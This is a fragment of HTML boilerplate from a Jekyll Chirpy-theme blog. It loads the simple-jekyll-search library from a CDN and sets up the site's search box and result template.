https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://smarinovic.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
